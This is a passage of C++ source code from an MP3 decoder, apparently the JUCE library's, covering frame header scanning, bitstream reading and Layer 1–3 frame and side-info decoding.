b1[0x1D] += b1[0x1B]; out1[0x10 * 5] = b1[0x15] + b1[0x1D]; out1[0x10 * 7] = b1[0x1D] + b1[0x13];
b1[0x1B] += b1[0x1F]; out1[0x10 * 9] = b1[0x13] + b1[0x1B]; out1[0x10 * 11] = b1[0x1B] + b1[0x17];
out1[0x10 * 13] = b1[0x17] + b1[0x1F]; out1[0x10 * 15] = b1[0x1F];
}
}
//==============================================================================
struct MP3Stream
{
MP3Stream (InputStream& source) : stream (source, 8192)
{
reset();
}
int decodeNextBlock (float* out0, float* out1, int& done)
{
if (! headerParsed)
{
auto nextFrameOffset = scanForNextFrameHeader (false);
if (lastFrameSize == -1 || needToSyncBitStream)
{
needToSyncBitStream = false;
readVBRHeader();
if (vbrHeaderFound)
return 1;
}
if (nextFrameOffset < 0)
return -1;
if (nextFrameOffset > 0)
{
wasFreeFormat = false;
needToSyncBitStream = true;
auto size = (int) (bufferPointer - (bufferSpace[bufferSpaceIndex] + 512));
if (size > 2880)
{
size = 0;
bufferPointer = bufferSpace[bufferSpaceIndex] + 512;
}
auto toSkip = (size + nextFrameOffset) - 2880;
if (toSkip > 0)
{
stream.skipNextBytes (toSkip);
nextFrameOffset -= toSkip;
}
stream.read (bufferPointer, nextFrameOffset);
lastFrameSize += nextFrameOffset;
}
const auto successful = frame.decodeHeader ((uint32) stream.readIntBigEndian());
if (successful == MP3Frame::ParseSuccessful::no)
return -1;
headerParsed = true;
frameSize = frame.frameSize;
isFreeFormat = (frameSize == 0);
sideInfoSize = frame.lsf != 0 ? ((frame.numChannels == 1) ? 9 : 17)
: ((frame.numChannels == 1) ? 17 : 32);
if (frame.crc16FollowsHeader)
sideInfoSize += 2;
bufferSpaceIndex = 1 - bufferSpaceIndex;
bufferPointer = bufferSpace[bufferSpaceIndex] + 512;
bitIndex = 0;
if (lastFrameSize < 0)
return 1;
}
if (! sideParsed)
{
if (frame.layer == 3)
{
stream.read (bufferPointer, sideInfoSize);
if (frame.crc16FollowsHeader)
getBits (16);
auto bits = jmax (0, decodeLayer3SideInfo());
dataSize = (bits + 7) / 8;
if (! isFreeFormat)
dataSize = jmin (dataSize, frame.frameSize - sideInfoSize);
}
else
{
dataSize = frame.frameSize;
sideInfoSize = 0;
}
sideParsed = true;
}
int result = 1;
if (! dataParsed)
{
stream.read (bufferPointer, dataSize);
if (out0 != nullptr)
{
if (frame.layer < 3 && frame.crc16FollowsHeader)
getBits (16);
switch (frame.layer)
{
case 1: decodeLayer1Frame (out0, out1, done); break;
case 2: decodeLayer2Frame (out0, out1, done); break;
case 3: decodeLayer3Frame (out0, out1, done); break;
default: break;
}
}
bufferPointer = bufferSpace[bufferSpaceIndex] + 512 + sideInfoSize + dataSize;
dataParsed = true;
result = 0;
}
if (isFreeFormat)
{
if (wasFreeFormat)
{
frameSize = lastFrameSizeNoPadding + frame.padding;
}
else
{
auto nextFrameOffset = scanForNextFrameHeader (true);
wasFreeFormat = isFreeFormat;
if (nextFrameOffset < 0)
{
lastFrameSize = frameSize;
return result;
}
frameSize = nextFrameOffset + sideInfoSize + dataSize;
lastFrameSizeNoPadding = frameSize - frame.padding;
}
}
if (result == 0)
return result;
int bytes = frameSize - (sideInfoSize + dataSize);
if (bytes > 0)
{
auto toSkip = bytes - 512;
if (toSkip > 0)
{
stream.skipNextBytes (toSkip);
bytes -= toSkip;
frameSize -= toSkip;
}
stream.read (bufferPointer, bytes);
bufferPointer += bytes;
}
lastFrameSize = frameSize;
wasFreeFormat = isFreeFormat;
frameSize = 0;
headerParsed = sideParsed = dataParsed = false;
return result;
}
bool seek (int frameIndex)
{
frameIndex = jmax (0, frameIndex);
while (frameIndex >= frameStreamPositions.size() * storedStartPosInterval)
{
int dummy = 0;
auto result = decodeNextBlock (nullptr, nullptr, dummy);
if (result < 0)
return false;
if (result > 0)
break;
}
frameIndex = jmin (frameIndex & ~(storedStartPosInterval - 1),
(frameStreamPositions.size() - 1) * storedStartPosInterval);
stream.setPosition (frameStreamPositions.getUnchecked (frameIndex / storedStartPosInterval));
currentFrameIndex = frameIndex;
reset();
return true;
}
MP3Frame frame;
VBRTagData vbrTagData;
BufferedInputStream stream;
int numFrames = 0, currentFrameIndex = 0;
bool vbrHeaderFound = false;
private:
bool headerParsed, sideParsed, dataParsed, needToSyncBitStream;
bool isFreeFormat, wasFreeFormat;
int sideInfoSize, dataSize;
int frameSize, lastFrameSize, lastFrameSizeNoPadding;
int bufferSpaceIndex;
Layer3SideInfo sideinfo;
uint8 bufferSpace[2][2880 + 1024];
uint8* bufferPointer;
int bitIndex, synthBo;
float hybridBlock[2][2][32 * 18];
int hybridBlockIndex[2];
float synthBuffers[2][2][0x110];
float hybridIn[2][32][18];
float hybridOut[2][18][32];
void reset() noexcept
{
headerParsed = sideParsed = dataParsed = isFreeFormat = wasFreeFormat = false;
lastFrameSize = -1;
needToSyncBitStream = true;
frameSize = sideInfoSize = dataSize = bitIndex = 0;
lastFrameSizeNoPadding = bufferSpaceIndex = 0;
bufferPointer = bufferSpace[bufferSpaceIndex] + 512;
synthBo = 1;
zerostruct (sideinfo);
zeromem (bufferSpace, sizeof (bufferSpace));
zeromem (hybridBlock, sizeof (hybridBlock));
zeromem (hybridBlockIndex, sizeof (hybridBlockIndex));
zeromem (synthBuffers, sizeof (synthBuffers));
}
enum { storedStartPosInterval = 4 };
Array<int64> frameStreamPositions;
struct SideInfoLayer1
{
uint8 allocation[32][2];
uint8 scaleFactor[32][2];
};
struct SideInfoLayer2
{
uint8 allocation[32][2];
uint8 scaleFactor[32][2][3];
};
static bool isValidHeader (uint32 header, int oldLayer) noexcept
{
auto newLayer = (int) (4 - ((header >> 17) & 3));
return (header & 0xffe00000) == 0xffe00000
&& newLayer != 4
&& (oldLayer <= 0 || newLayer == oldLayer)
&& ((header >> 12) & 15) != 15
&& ((header >> 10) & 3) != 3
&& (header & 3) != 2;
}
bool rollBackBufferPointer (int backstep) noexcept
{
if (lastFrameSize < 0 && backstep > 0)
return false;
auto* oldBuffer = bufferSpace[1 - bufferSpaceIndex] + 512;
bufferPointer -= backstep;
if (backstep != 0)
memcpy (bufferPointer, oldBuffer + lastFrameSize - backstep, (size_t) backstep);
bitIndex = 0;
return true;
}
uint32 getBits (int numBits) noexcept
{
if (numBits <= 0 || bufferPointer == nullptr)
return 0;
const auto result = (uint32) (((((((bufferPointer[0] << 8) | bufferPointer[1]) << 8)
| bufferPointer[2]) << bitIndex) & 0xffffff) >> (24 - numBits));
bitIndex += numBits;
bufferPointer += (bitIndex >> 3);
bitIndex &= 7;
return result;
}
uint32 getOneBit() noexcept
{
auto result = (uint8) (*bufferPointer << bitIndex);
++bitIndex;
bufferPointer += (bitIndex >> 3);
bitIndex &= 7;
return (uint32) (result >> 7);
}
uint32 getBitsUnchecked (int numBits) noexcept
{
const auto result = (uint32) (((((bufferPointer[0] << 8) | bufferPointer[1]) << bitIndex) & 0xffff) >> (16 - numBits));
bitIndex += numBits;
bufferPointer += (bitIndex >> 3);
bitIndex &= 7;
return result;
}
inline uint8 getBitsUint8 (int numBits) noexcept { return (uint8) getBitsUnchecked (numBits); }
inline uint16 getBitsUint16 (int numBits) noexcept { return (uint16) getBitsUnchecked (numBits); }
int scanForNextFrameHeader (bool checkTypeAgainstLastFrame) noexcept
{
auto oldPos = stream.getPosition();
int offset = -3;
uint32 header = 0;
for (;;)
{
if (stream.isExhausted() || stream.getPosition() > oldPos + 32768)
{
offset = -1;
break;
}
header = (header << 8) | (uint8) stream.readByte();
if (offset >= 0 && isValidHeader (header, frame.layer))
{
if (! checkTypeAgainstLastFrame)
break;
const bool mpeg25 = (header & (1 << 20)) == 0;
const uint32 lsf = mpeg25 ? 1 : ((header & (1 << 19)) ? 0 : 1);
const uint32 sampleRateIndex = mpeg25 ? (6 + ((header >> 10) & 3)) : (((header >> 10) & 3) + (lsf * 3));
const uint32 mode = (header >> 6) & 3;
const uint32 numChannels = (mode == 3) ? 1 : 2;
if (numChannels == (uint32) frame.numChannels && lsf == (uint32) frame.lsf
&& mpeg25 == frame.mpeg25 && sampleRateIndex == (uint32) frame.sampleRateIndex)
break;
}
++offset;
}
if (offset >= 0)
{
if ((currentFrameIndex & (storedStartPosInterval - 1)) == 0)
frameStreamPositions.set (currentFrameIndex / storedStartPosInterval, oldPos + offset);
++currentFrameIndex;
}
stream.setPosition (oldPos);
return offset;
}
void readVBRHeader()
{
auto oldPos = stream.getPosition();
uint8 xing[194];
stream.read (xing, sizeof (xing));
vbrHeaderFound = vbrTagData.read (xing);
if (vbrHeaderFound)
{
numFrames = (int) vbrTagData.frames;
oldPos += jmax (vbrTagData.headersize, 1);
}
stream.setPosition (oldPos);
}
void decodeLayer1Frame (float* pcm0, float* pcm1, int& samplesDone) noexcept
{
float fraction[2][32];
SideInfoLayer1 si;
layer1Step1 (si);
auto single = (frame.numChannels == 1 || frame.single == 3) ? 0 : frame.single;
if (single >= 0)
{
for (int i = 0; i < 12; ++i)
{
layer1Step2 (si, fraction);
synthesise (fraction[single], 0, pcm0, samplesDone);
}
}
else
{
for (int i = 0; i < 12; ++i)
{
layer1Step2 (si, fraction);
synthesiseStereo (fraction[0], fraction[1], pcm0, pcm1, samplesDone);
}
}
}
void decodeLayer2Frame (float* pcm0, float* pcm1, int& samplesDone)
{
float fraction[2][4][32];
frame.selectLayer2Table();
SideInfoLayer2 si;
layer2Step1 (si);
auto single = (frame.numChannels == 1 || frame.single == 3) ? 0 : frame.single;
if (single >= 0)
{
for (int i = 0; i < 12; ++i)
{
layer2Step2 (si, i >> 2, fraction);
for (int j = 0; j < 3; ++j)
synthesise (fraction[single][j], 0, pcm0, samplesDone);
}
}
else
{
for (int i = 0; i < 12; ++i)
{
layer2Step2 (si, i >> 2, fraction);
for (int j = 0; j < 3; ++j)
synthesiseStereo (fraction[0][j], fraction[1][j], pcm0, pcm1, samplesDone);
}
}
}
void decodeLayer3Frame (float* pcm0, float* pcm1, int& samplesDone) noexcept
{
if (! rollBackBufferPointer ((int) sideinfo.mainDataStart))
return;
const int single = frame.numChannels == 1 ? 0 : frame.single;
const int numChans = (frame.numChannels == 1 || single >= 0) ? 1 : 2;
const bool msStereo = (frame.mode == 1) && (frame.modeExt & 2) != 0;
const bool iStereo = (frame.mode == 1) && (frame.modeExt & 1) != 0;
const int granules = frame.lsf ? 1 : 2;
int scaleFactors[2][39];
for (int gr = 0; gr < granules; ++gr)
{
{
auto& granule = sideinfo.ch[0].gr[gr];
auto part2bits = frame.lsf ? getLayer3ScaleFactors2 (scaleFactors[0], granule, 0)
: getLayer3ScaleFactors1 (scaleFactors[0], granule);
if (layer3DequantizeSample (hybridIn[0], scaleFactors[0], granule, frame.sampleRateIndex, part2bits))
return;
}
if (frame.numChannels == 2)
{
auto& granule = sideinfo.ch[1].gr[gr];
auto part2bits = frame.lsf ? getLayer3ScaleFactors2 (scaleFactors[1], granule, iStereo)
: getLayer3ScaleFactors1 (scaleFactors[1], granule);
if (layer3DequantizeSample (hybridIn[1], scaleFactors[1], granule, frame.sampleRateIndex, part2bits))
return;
if (msStereo)
{
for (int i = 0; i < 32 * 18; ++i)
{
auto tmp0 = ((const float*) hybridIn[0])[i];
auto tmp1 = ((const float*) hybridIn[1])[i];
((float*) hybridIn[1])[i] = tmp0 - tmp1;
((float*) hybridIn[0])[i] = tmp0 + tmp1;
}
}
if (iStereo)
granule.doIStereo (hybridIn, scaleFactors[1], frame.sampleRateIndex, msStereo, frame.lsf);
if (msStereo || iStereo || single == 3)
{
if (granule.maxb > sideinfo.ch[0].gr[gr].maxb)
sideinfo.ch[0].gr[gr].maxb = granule.maxb;
else
granule.maxb = sideinfo.ch[0].gr[gr].maxb;
}
switch (single)
{
case 3:
{
auto* in0 = (float*) hybridIn[0];
auto* in1 = (const float*) hybridIn[1];
for (int i = 0; i < (int) (18 * granule.maxb); ++i, ++in0)
*in0 = (*in0 + *in1++);
}
break;
case 1:
{
auto* in0 = (float*) hybridIn[0];
auto* in1 = (const float*) hybridIn[1];
for (int i = 0; i < (int) (18 * granule.maxb); ++i)
*in0++ = *in1++;
}
break;
default:
break;
}
}
for (int ch = 0; ch < numChans; ++ch)
{
auto& granule = sideinfo.ch[ch].gr[gr];
granule.doAntialias (hybridIn[ch]);
layer3Hybrid (hybridIn[ch], hybridOut[ch], ch, granule);
}
for (int ss = 0; ss < 18; ++ss)
{
if (single >= 0)
synthesise (hybridOut[0][ss], 0, pcm0, samplesDone);
else
synthesiseStereo (hybridOut[0][ss], hybridOut[1][ss], pcm0, pcm1, samplesDone);
}
}
}
int decodeLayer3SideInfo() noexcept
{
const int numChannels = frame.numChannels;
const int sampleRate = frame.sampleRateIndex;
const int single = (numChannels == 1) ? 0 : frame.single;
const bool msStereo = (frame.mode == 1) && (frame.modeExt & 2) != 0;
const int granules = frame.lsf ? 1 : 2;
if (frame.lsf == 0)
getLayer3SideInfo1 (numChannels, msStereo, sampleRate, single);
else
getLayer3SideInfo2 (numChannels, msStereo, sampleRate, single);
int databits = 0;
for (int gr = 0; gr < granules; ++gr)
for (int ch = 0; ch < numChannels; ++ch)
databits += (int) sideinfo.ch[ch].gr[gr].part2_3Length;
return databits - 8 * (int) sideinfo.mainDataStart;
}
void layer1Step1 (SideInfoLayer1& si) noexcept
{
zerostruct (si);
int i, jsbound = (frame.mode == 1) ? (frame.modeExt << 2) + 4 : 32;
if (frame.numChannels == 2)
{
for (i = 0; i < jsbound; ++i)
{
si.allocation[i][0] = getBitsUint8 (4);
si.allocation[i][1] = getBitsUint8 (4);
}
for (i = jsbound; i < 32; ++i)
si.allocation[i][0] = si.allocation[i][1] = getBitsUint8 (4);
for (i = 0; i < 32; ++i)
{
si.scaleFactor[i][0] = si.allocation[i][0] ? getBitsUint8 (6) : 0;
si.scaleFactor[i][1] = si.allocation[i][1] ? getBitsUint8 (6) : 0;
}
}
else
{
for (i = 0; i < 32; ++i)
si.allocation[i][0] = getBitsUint8 (4);
for (i = 0; i < 32; ++i)
si.scaleFactor[i][0] = si.allocation[i][0] ? getBitsUint8 (6) : 0;
}
}
void layer1Step2 (SideInfoLayer1& si, float fraction[2][32]) noexcept
{
if (frame.numChannels == 2)
{
int i, jsbound = (frame.mode == 1) ? (frame.modeExt << 2) + 4 : 32;
for (i = 0; i < jsbound; ++i)
{
const uint8 n0 = si.allocation[i][0];
const uint8 n1 = si.allocation[i][1];
fraction[0][i] = n0 > 0 ? ((float) (-(1 << n0) + getBitsUint16 (n0 + 1) + 1) * constants.muls[n0 + 1][si.scaleFactor[i][0]]) : 0.0f;
fraction[1][i] = n1 > 0 ? ((float) (-(1 << n1) + getBitsUint16 (n1 + 1) + 1) * constants.muls[n1 + 1][si.scaleFactor[i][1]]) : 0.0f;
}
for (i = jsbound; i < 32; ++i)
{
const uint8 n = si.allocation[i][0];
if (n > 0)
{
const uint32 w = ((uint32) -(1 << n) + getBitsUint16 (n + 1) + 1);
fraction[0][i] = ((float) w * constants.muls[n + 1][si.scaleFactor[i][0]]);
fraction[1][i] = ((float) w * constants.muls[n + 1][si.scaleFactor[i][1]]);
}
else
fraction[0][i] = fraction[1][i] = 0;
}
}
else
{
for (int i = 0; i < 32; ++i)
{
const uint8 n = si.allocation[i][0];
const uint8 j = si.scaleFactor[i][0];
if (n > 0)
fraction[0][i] = ((float) (-(1 << n) + getBitsUint16 (n + 1) + 1) * constants.muls[n + 1][j]);
else
fraction[0][i] = 0;
}
}
}
void layer2Step1 (SideInfoLayer2& si) noexcept
{
zerostruct (si);
const auto sblimit = frame.layer2SubBandLimit;
const auto jsbound = (frame.mode == 1 ? jmin ((frame.modeExt << 2) + 4, sblimit) : sblimit);
auto* allocTable = frame.allocationTable;
uint8 scfsi[32][2];
if (frame.numChannels == 2)
{
for (int i = 0; i < jsbound; ++i)
{
auto step = allocTable->bits;
allocTable += (static_cast<intptr_t> (1) << step);
si.allocation[i][0] = getBitsUint8 (step);
si.allocation[i][1] = getBitsUint8 (step);
}
for (int i = jsbound; i < sblimit; ++i)
{
auto step = allocTable->bits;
auto b0 = getBitsUint8 (step);
allocTable += (static_cast<intptr_t> (1) << step);
si.allocation[i][0] = b0;
si.allocation[i][1] = b0;
}
for (int i = 0; i < sblimit; ++i)
{
scfsi[i][0] = si.allocation[i][0] ? getBitsUint8 (2) : 0;
scfsi[i][1] = si.allocation[i][1] ? getBitsUint8 (2) : 0;
}
}
else
{
for (int i = 0; i < sblimit; ++i)
{
const int16 step = allocTable->bits;
allocTable += (static_cast<intptr_t> (1) << step);
si.allocation[i][0] = getBitsUint8 (step);
}
for (int i = 0; i < sblimit; ++i)
scfsi[i][0] = si.allocation[i][0] ? getBitsUint8 (2) : 0;
}
for (int i = 0; i < sblimit; ++i)
{
for (int ch = 0; ch < frame.numChannels; ++ch)
{
uint8 s0 = 0, s1 = 0, s2 = 0;
if (si.allocation[i][ch])
{
switch (scfsi[i][ch])
{
case 0:
s0 = getBitsUint8 (6);
s1 = getBitsUint8 (6);
s2 = getBitsUint8 (6);
break;
case 1:
s1 = s0 = getBitsUint8 (6);
s2 = getBitsUint8 (6);
break;
case 2:
s2 = s1 = s0 = getBitsUint8 (6);
break;
case 3:
s0 = getBitsUint8 (6);
s2 = s1 = getBitsUint8 (6);
break;
default:
break;
}
}
si.scaleFactor[i][ch][0] = s0;
si.scaleFactor[i][ch][1] = s1;
si.scaleFactor[i][ch][2] = s2;
}
}
}
void layer2Step2 (SideInfoLayer2& si, const int gr, float fraction[2][4][32]) noexcept
{
auto* allocTable = frame.allocationTable;
auto sblimit = frame.layer2SubBandLimit;
const auto jsbound = (frame.mode == 1 ? jmin ((frame.modeExt << 2) + 4, sblimit) : sblimit);
for (int i = 0; i < jsbound; ++i)
{
auto step = allocTable->bits;
for (int ch = 0; ch < frame.numChannels; ++ch)
{
if (auto ba = si.allocation[i][ch])
{
auto x1 = jmin ((uint8) 63, si.scaleFactor[i][ch][gr]);
auto* alloc2 = allocTable + ba;
auto k = jmin ((int16) 16, alloc2->bits);
auto d1 = alloc2->d;
if (d1 < 0)
{
const double cm = constants.muls[k][x1];
fraction[ch][0][i] = (float) (((int) getBits (k) + d1) * cm);
fraction[ch][1][i] = (float) (((int) getBits (k) + d1) * cm);
fraction[ch][2][i] = (float) (((int) getBits (k) + d1) * cm);
}
else
{
auto* tab = constants.getGroupTable (d1, getBits (k));
fraction[ch][0][i] = (float) constants.muls[tab[0]][x1];
fraction[ch][1][i] = (float) constants.muls[tab[1]][x1];
fraction[ch][2][i] = (float) constants.muls[tab[2]][x1];
}
}
else
{
fraction[ch][0][i] = fraction[ch][1][i] = fraction[ch][2][i] = 0;
}
}
allocTable += (static_cast<intptr_t> (1) << step);
}
for (int i = jsbound; i < frame.layer2SubBandLimit; ++i)
{
auto step = allocTable->bits;
auto ba = si.allocation[i][0];
if (ba != 0)
{
auto* alloc2 = allocTable + ba;
int16 k = alloc2->bits;
int16 d1 = alloc2->d;
k = (k <= 16) ? k : 16;
if (d1 < 0)
{
auto v0 = (int) getBits (k);
auto v1 = (int) getBits (k);
auto v2 = (int) getBits (k);
for (int ch = 0; ch < frame.numChannels; ++ch)
{
auto x1 = jmin ((uint8) 63, si.scaleFactor[i][ch][gr]);
const double cm = constants.muls[k][x1];
fraction[ch][0][i] = (float) ((v0 + d1) * cm);
fraction[ch][1][i] = (float) ((v1 + d1) * cm);
fraction[ch][2][i] = (float) ((v2 + d1) * cm);
}
}
else
{
auto* tab = constants.getGroupTable (d1, getBits (k));
auto k0 = tab[0];
auto k1 = tab[1];
auto k2 = tab[2];
for (int ch = 0; ch < frame.numChannels; ++ch)
{
auto x1 = jmin ((uint8) 63, si.scaleFactor[i][ch][gr]);
fraction[ch][0][i] = (float) constants.muls[k0][x1];
fraction[ch][1][i] = (float) constants.muls[k1][x1];
fraction[ch][2][i] = (float) constants.muls[k2][x1];
}
}
}
else
{
fraction[0][0][i] = fraction[0][1][i] = fraction[0][2][i] = 0;
fraction[1][0][i] = fraction[1][1][i] = fraction[1][2][i] = 0;
}
allocTable += (static_cast<intptr_t> (1) << step);
}
for (int ch = 0; ch < frame.numChannels; ++ch)
for (int i = frame.layer2SubBandLimit; i < 32; ++i)
fraction[ch][0][i] = fraction[ch][1][i] = fraction[ch][2][i] = 0;
}
void getLayer3SideInfo1 (const int stereo, const bool msStereo, const int sampleRate, const int single) noexcept
{
const int powdiff = (single == 3) ? 4 : 0;
sideinfo.mainDataStart = getBits (9);
sideinfo.privateBits = getBitsUnchecked (stereo == 1 ? 5 : 3);
for (int ch = 0; ch < stereo; ++ch)
{
sideinfo.ch[ch].gr[0].scfsi = -1;
sideinfo.ch[ch].gr[1].scfsi = (int) getBitsUnchecked (4);
}
for (int gr = 0; gr < 2; ++gr)
{
for (int ch = 0; ch < stereo; ++ch)
{
auto& granule = sideinfo.ch[ch].gr[gr];
granule.part2_3Length = getBits (12);
granule.bigValues = jmin (288u, getBitsUnchecked (9));
const int qss = (int) getBitsUnchecked (8);
granule.pow2gain = constants.powToGains + 256 - qss + powdiff;
if (msStereo)
granule.pow2gain += 2;
granule.scaleFactorCompression = getBitsUnchecked (4);
if (getOneBit())
{
granule.blockType = getBitsUnchecked (2);
granule.mixedBlockFlag = getOneBit();
granule.tableSelect[0] = getBitsUnchecked (5);
granule.tableSelect[1] = getBitsUnchecked (5);
granule.tableSelect[2] = 0;
for (int i = 0; i < 3; ++i)
{
const uint32 sbg = (getBitsUnchecked (3) << 3);
granule.fullGain[i] = granule.pow2gain + sbg;
}
granule.region1Start = 36 >> 1;
granule.region2Start = 576 >> 1;
}
else
{
for (int i = 0; i < 3; ++i)
granule.tableSelect[i] = getBitsUnchecked (5);
const int r0c = (int) getBitsUnchecked (4);
const int r1c = (int) getBitsUnchecked (3);
const int region0index = jmin (22, r0c + 1);
const int region1index = jmin (22, r0c + 1 + r1c + 1);
granule.region1Start = (uint32) (bandInfo[sampleRate].longIndex[region0index] >> 1);
granule.region2Start = (uint32) (bandInfo[sampleRate].longIndex[region1index] >> 1);
granule.blockType = 0;
granule.mixedBlockFlag = 0;
}
granule.preflag = getOneBit();
granule.scaleFactorScale = getOneBit();
granule.count1TableSelect = getOneBit();
}
}
}
void getLayer3SideInfo2 (const int stereo, const bool msStereo, const int sampleRate, const int single) noexcept
{
const int powdiff = (single == 3) ? 4 : 0;
sideinfo.mainDataStart = getBits (8);
sideinfo.privateBits = stereo == 1 ? getOneBit() : getBitsUnchecked (2);
for (int ch = 0; ch < stereo; ++ch)
{
auto& granule = sideinfo.ch[ch].gr[0];
granule.part2_3Length = getBits (12);
granule.bigValues = jmin (288u, getBitsUnchecked (9));
const uint32 qss = getBitsUnchecked (8);
granule.pow2gain = constants.powToGains + 256 - qss + powdiff;
if (msStereo)
granule.pow2gain += 2;
granule.scaleFactorCompression = getBits (9);
if (getOneBit())
{
granule.blockType = getBitsUnchecked (2);
granule.mixedBlockFlag = getOneBit();
granule.tableSelect[0] = getBitsUnchecked (5);
granule.tableSelect[1] = getBitsUnchecked (5);
granule.tableSelect[2] = 0;
for (int i = 0; i < 3; ++i)
{
const uint32 sbg = (getBitsUnchecked (3) << 3);
granule.fullGain[i] = granule.pow2gain + sbg;
}
if (granule.blockType == 0)
{}
if (granule.blockType == 2)
granule.region1Start = sampleRate == 8 ? 36 : (36 >> 1);
else
granule.region1Start = sampleRate == 8 ? (108 >> 1) : (54 >> 1);
granule.region2Start = 576 >> 1;
}
else
{
for (int i = 0; i < 3; ++i)
granule.tableSelect[i] = getBitsUnchecked (5);
const int r0c = (int) getBitsUnchecked (4);
const int r1c = (int) getBitsUnchecked (3);
const int region0index = jmin (22, r0c + 1);
const int region1index = jmin (22, r0c + 1 + r1c + 1);
granule.region1Start = (uint32) (bandInfo[sampleRate].longIndex[region0index] >> 1);
granule.region2Start = (uint32) (bandInfo[sampleRate].longIndex[region1index] >> 1);
granule.blockType = 0;
granule.mixedBlockFlag = 0;
}
granule.scaleFactorScale = getOneBit();
granule.count1TableSelect = getOneBit();
}
}
int getLayer3ScaleFactors1 (int* scf, const Layer3SideInfo::Info& granule) noexcept
{
static const uint8 lengths[2][16] =
{
{ 0, 0, 0, 0, 3, 1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4 },
{ 0, 1, 2, 3, 0, 1, 2, 3, 1, 2, 3, 1, 2, 3, 2, 3 }
};
int numBits;
const int num0 = lengths[0][granule.scaleFactorCompression];
const int num1 = lengths[1][granule.scaleFactorCompression];
if (granule.blockType == 2)
{
int i = 18;
numBits = (num0 + num1) * 18;
if (granule.mixedBlockFlag)
{
for (int j = 8; --j >= 0;) *scf++ = (int) getBitsUnchecked (num0);
numBits -= num0;
i = 9;
}
for (; --i >= 0;) *scf++ = (int) getBitsUnchecked (num0);
for (i = 18; --i >= 0;) *scf++ = (int) getBitsUnchecked (num1);
*scf++ = 0;
*scf++ = 0;
*scf++ = 0;
}
else
{
const int scfsi = granule.scfsi;
if (scfsi < 0)
{
for (int i = 11; --i >= 0;) *scf++ = (int) getBitsUnchecked (num0);
for (int j = 10; --j >= 0;) *scf++ = (int) getBitsUnchecked (num1);
numBits = (num0 + num1) * 10 + num0;
}
else
{
numBits = 0;
if ((scfsi & 8) == 0)
{
for (int i = 6; --i >= 0;) *scf++ = (int) getBitsUnchecked (num0);
numBits += num0 * 6;
}
else
scf += 6;
if ((scfsi & 4) == 0)
{
for (int i = 5; --i >= 0;) *scf++ = (int) getBitsUnchecked (num0);
numBits += num0 * 5;
}
else
scf += 5;
if ((scfsi & 2) == 0)
{
for (int i = 5; --i >= 0;) *scf++ = (int) getBitsUnchecked (num1);
numBits += num1 * 5;
}
else
scf += 5;
if ((scfsi & 1) == 0)
{
for (int i = 5; --i >= 0;) *scf++ = (int) getBitsUnchecked (num1);
numBits += num1 * 5;
}
else
scf += 5;
}
*scf = 0;
}
return numBits;
}
int getLayer3ScaleFactors2 (int* scf, Layer3SideInfo::Info& granule, const bool iStereo) noexcept
{
static const uint8 scaleTable[3][6][4] =
{
{ { 6, 5, 5, 5 }, { 6, 5, 7, 3 }, { 11, 10, 0, 0 }, { 7, 7, 7, 0 }, { 6, 6, 6, 3 }, { 8, 8, 5, 0 } },
{ { 9, 9, 9, 9 }, { 9, 9, 12, 6 }, { 18, 18, 0, 0 }, { 12, 12, 12, 0 }, { 12, 9, 9, 6 }, { 15, 12, 9, 0 } },
{ { 6, 9, 9, 9 }, { 6, 9, 12, 6 }, { 15, 18, 0, 0 }, { 6, 15, 12, 0 }, { 6, 12, 9, 6 }, { 6, 18, 9, 0 } }
};
uint32 len = iStereo ? constants.iLength2[granule.scaleFactorCompression >> 1]
: constants.nLength2[granule.scaleFactorCompression];
granule.preflag = (len >> 15) & 1;
int n = 0;
if (granule.blockType == 2)
{
++n;
if (granule.mixedBlockFlag)
++n;
}
const uint8* const data = scaleTable[n][(len >> 12) & 7];
int numBits = 0;
for (int i = 0; i < 4; ++i)
{
int num = len & 7;
len >>= 3;
if (num)
{
for (int j = 0; j < (int) (data[i]); ++j)
*scf++ = (int) getBitsUnchecked (num);
numBits += data[i] * num;
}
else
{
for (int j = 0; j < (int) (data[i]); ++j)
*scf++ = 0;
}
}
n = (n << 1) + 1;
for (int i = 0; i < n; ++i)
*scf++ = 0;
return numBits;
}
bool layer3DequantizeSample (float xr[32][18], int* scf, Layer3SideInfo::Info& granule, int sampleRate, int part2bits) noexcept
{
const uint32 shift = 1 + granule.scaleFactorScale;
auto* xrpnt = (float*) xr;
auto part2remain = (int) granule.part2_3Length - part2bits;
zeromem (xrpnt, (size_t) (&xr[32][0] - xrpnt) * sizeof (float));
auto bv = (int) granule.bigValues;
auto region1 = (int) granule.region1Start;
auto region2 = (int) granule.region2Start;
int l3 = ((576 >> 1) - bv) >> 1;
int l[3];
if (bv <= region1)
{
l[0] = bv;
l[1] = 0;
l[2] = 0;
}
else
{
l[0] = region1;
if (bv <= region2)
{
l[1] = bv - l[0];
l[2] = 0;
}
else
{
l[1] = region2 - l[0];
l[2] = bv - region2;
}
}
for (int i = 0; i < 3; ++i)
if (l[i] < 0)
l[i] = 0;
if (granule.blockType == 2)
{
int max[4];
int step = 0, lwin = 0, cb = 0, mc = 0;
float v = 0;
int* map;
int* mapEnd;
if (granule.mixedBlockFlag)
{
max[3] = -1;
max[0] = max[1] = max[2] = 2;
map = constants.map [sampleRate][0];
mapEnd = constants.mapEnd[sampleRate][0];
}
else
{
max[0] = max[1] = max[2] = max[3] = -1;
map = constants.map [sampleRate][1];
mapEnd = constants.mapEnd[sampleRate][1];
}
for (int i = 0; i < 2; ++i)
{
auto* h = huffmanTables1 + granule.tableSelect[i];
for (int lp = l[i]; lp != 0; --lp, --mc)
{
int x, y;
if (mc == 0)
{
mc = *map++;
xrpnt = ((float*) xr) + (*map++);
lwin = *map++;
cb = *map++;
if (lwin == 3)
{
v = granule.pow2gain[ (*scf++) << shift];
step = 1;
}
else
{
v = granule.fullGain[lwin][ (*scf++) << shift];
step = 3;
}
}
auto* val = h->table;
while ((y = *val++) < 0)
{
if (getOneBit())
val -= y;
--part2remain;
}
x = y >> 4;
y &= 15;
if (x == 15)
{
max[lwin] = cb;
part2remain -= (int) (h->bits + 1);
x += (int) getBits ((int) h->bits);
*xrpnt = constants.nToThe4Over3[x] * (getOneBit() ? -v : v);
}
else if (x)
{
max[lwin] = cb;
*xrpnt = constants.nToThe4Over3[x] * (getOneBit() ? -v : v);
--part2remain;
}
else
*xrpnt = 0;
xrpnt += step;
if (y == 15)
{
max[lwin] = cb;
part2remain -= (int) (h->bits + 1);
y += (int) getBits ((int) h->bits);
*xrpnt = constants.nToThe4Over3[y] * (getOneBit() ? -v : v);
}
else if (y)
{
max[lwin] = cb;
